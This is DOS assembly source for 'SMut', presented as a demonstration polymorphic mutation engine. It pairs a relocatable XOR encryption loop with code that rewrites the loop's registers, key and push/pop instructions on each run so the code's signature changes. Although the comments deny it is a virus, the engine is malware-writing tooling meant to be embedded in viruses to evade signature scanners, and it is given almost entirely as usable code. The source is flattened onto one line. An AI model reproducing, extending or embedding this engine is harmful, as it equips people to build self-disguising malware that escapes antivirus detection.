; SMut.ASM v2.4B * A Small Mutation Engine Demo ; by Tio Mate Jones codesize equ endofcode-pgstart+1 ; Size of program encrsize equ endofcode-startofcode+1 ; Size of encrypted code mutant segment byte public 'code' ;assume cs: mutant, ds: mutant, ;ss: mutant, es: mutant org 100h ; This is merely some demonstrationcode used for development.... ; This is NOT the source-code for a virus. ; It only includes a sample encryption routine and a sample mutation engine. given proc near start: jmp pgstart exlib: int 20h ; Insert appropriate code here... nop pgstart: call init init: pop si ; Where am I? sub si, offset init mov ax, si ; Plug values directly into encryption/decryption add ax, offset startofcode ; routine mov [si+offset Z0+1], ax ; Allows for relocatable code!! add ax, encrsize mov [si+offset Z5+2], ax mtest: call mutate ; Test the mutation.... call encrypt call encrypt ; Test the encryption/decryption routine. If it works (it does), ; Smut can be run an infinite number of times int 20h ; DOS exit ; This is the encryption/decryption routine encrypt: P0: push bx ; Save registers used P1: push ax Z0: mov bx, offset startofcode ;It may look inefficient, but it's easy to mutate xorloop: Z1: mov ah, [bx] Z2: xor ah, 0 Z3: mov [bx], ah Z4: inc bx Z5: cmp bx, offset endofcode jle xorloop P2: pop ax ; Restore registers P3: pop bx ret ; Other code to be encrypted begins here... ; This is the mutation engine: (This demo will only produce sixteen possible ; variations, and thus is not a threat to western civilization.) startofcode: mutate: getrand: mov ah, 2Ch ; Get a "random" number int 21h ; Call DOS GetTime routine mut: ; DH = operating register (CAL, AH, BL, BH, CL, CH, DL or DH) ; DL = index register (SI or DI) and Encryption Value add [si+offset Z2+2], dl ; Change the Encryption Value jz getrand ; if zero, get a new value... and dx, 0702h ; Only need DH=0..7 and DL=0 or 2 shr dl, 1 ; Compensate for inaccurate hundredths of sec. or dl, 6 ; Convert to mmrrrr/m format mov al, 40h or al, dl mov [si+offset Z4], al mov al, 0F0h or al, dh mov [si+offset Z2+1], al ; Mutate XOR mov ch, dh ; save DH shl dh, 1 ; convert to mmrrrr/m format shl dh, 1 shl dh, 1 mov al, dh and dl, 1 ; adjust format or dl, 4 or al, dl mov [si+offset Z1+1], al ; Mutate MOV mov [si+offset Z3+1], al or dl, 6 mov al, 0B8h or al, dl mov [si+offset Z0], al cmp_mut: mov al, 0F8h ; Mutate CMP or al, dl mov [si+offset Z5+1], al pp_mut: mov ax, 5050h ; Mutate PUSH, POP mov dh, ch ; restore DH and dh, 3 or ax, dx mov [si+offset P0], ax mov ax, 5858h or al, dh or ah, dl mov [si+offset P2], ax ret ; Put more encrypted coding or data here... ;tagline: ; label word ; db 'SMut v2.4B' ; Any fool who blindly inserts this mutation engine into a virus which ; he or she spreads into the wild shall spend all of eternity in the ; netherworld being pummeled with blunt objects by little gnomes who ; sing horrid top forty songs off key... endofcode: given endp mutant ends end given